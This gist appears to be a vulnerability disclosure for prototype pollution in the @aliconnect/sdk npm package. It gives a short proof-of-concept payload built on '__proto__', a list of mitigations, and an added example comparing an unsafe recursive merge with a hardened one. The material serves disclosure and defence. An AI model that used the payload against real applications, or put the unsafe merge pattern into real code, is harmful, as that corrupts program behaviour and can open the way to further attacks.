@tariqhawis
Last active March 22, 2024 19:47
Prototype Pollution Affecting @aliconnect/sdk package

Affected versions of this package are vulnerable to Prototype Pollution via the sdk function because it does not check whether an attribute name resolves to the object prototype.

To exploit the vulnerability, an attacker can pass a malicious object from user-controllable input to the aim function in aim.js. The input resolves to the object prototype and thereby modifies the behaviour of the program.

PoC:

var sdk = require("@aliconnect/sdk")
// Parsed from a string so that "__proto__" becomes an own key instead of setting the prototype
var BAD_JSON = JSON.parse('{"__proto__":{"polluted":true}}');
console.log('before prototype pollution: polluted:', {}.polluted)
sdk({}, BAD_JSON)  // merges BAD_JSON into the target without checking for prototype keys
console.log('after prototype pollution: polluted:', {}.polluted)

Mitigation:

  1. Freeze the prototype: use Object.freeze(Object.prototype).
  2. Validate JSON inputs.
  3. Use Map instead of Object.
  4. Create objects without a prototype; this breaks the prototype chain and prevents pollution. Example:
let obj = Object.create(null);
obj.__proto__ // undefined
obj.constructor // undefined
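The following added example (not code from the gist or from the @aliconnect/sdk package) assumes the sdk function performs a recursive merge of the second argument into the first, and shows such a merge in its vulnerable form next to a hardened version that skips prototype-resolving keys, as suggested by mitigation 2.

```javascript
// Added example: a minimal recursive merge, assumed to resemble what the
// vulnerable sdk function does, beside a hardened version.
const BANNED_KEYS = new Set(["__proto__", "constructor", "prototype"]);

function isPlainObject(v) {
  return v !== null && typeof v === "object" && !Array.isArray(v);
}

// Vulnerable: copies every key. For key "__proto__", target[key] is the
// accessor on Object.prototype, so the recursion writes into the prototype.
function unsafeMerge(target, source) {
  for (const key in source) {
    if (isPlainObject(source[key])) {
      if (!isPlainObject(target[key])) target[key] = {};
      unsafeMerge(target[key], source[key]);
    } else {
      target[key] = source[key];
    }
  }
  return target;
}

// Hardened: only own keys, never the ones that resolve to the prototype,
// and only recurse into properties the target itself owns.
function safeMerge(target, source) {
  for (const key of Object.keys(source)) {
    if (BANNED_KEYS.has(key)) continue;
    const value = source[key];
    if (isPlainObject(value)) {
      const own = Object.prototype.hasOwnProperty.call(target, key);
      if (!own || !isPlainObject(target[key])) target[key] = {};
      safeMerge(target[key], value);
    } else {
      target[key] = value;
    }
  }
  return target;
}

// Constructed payload with the same shape as the gist's PoC.
function demo() {
  const payload = '{"__proto__":{"polluted":true},"cfg":{"debug":true}}';
  const out = {};
  const safeTarget = safeMerge({}, JSON.parse(payload));
  out.safeCopiedCfg = safeTarget.cfg.debug; // ordinary keys still merge
  out.safeAfter = ({}).polluted;            // prototype untouched
  unsafeMerge({}, JSON.parse(payload));
  out.unsafeAfter = ({}).polluted;          // every object is now polluted
  delete Object.prototype.polluted;         // undo the pollution for this process
  return out;
}
```

Run with node to see the two merges side by side; after the unsafe merge, the property appears on every object until the cleanup line removes it.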

Reference

https://learn.snyk.io/lesson/prototype-pollution/#a0a863a5-fd3a-539f-e1ed-a0769f6c6e3b
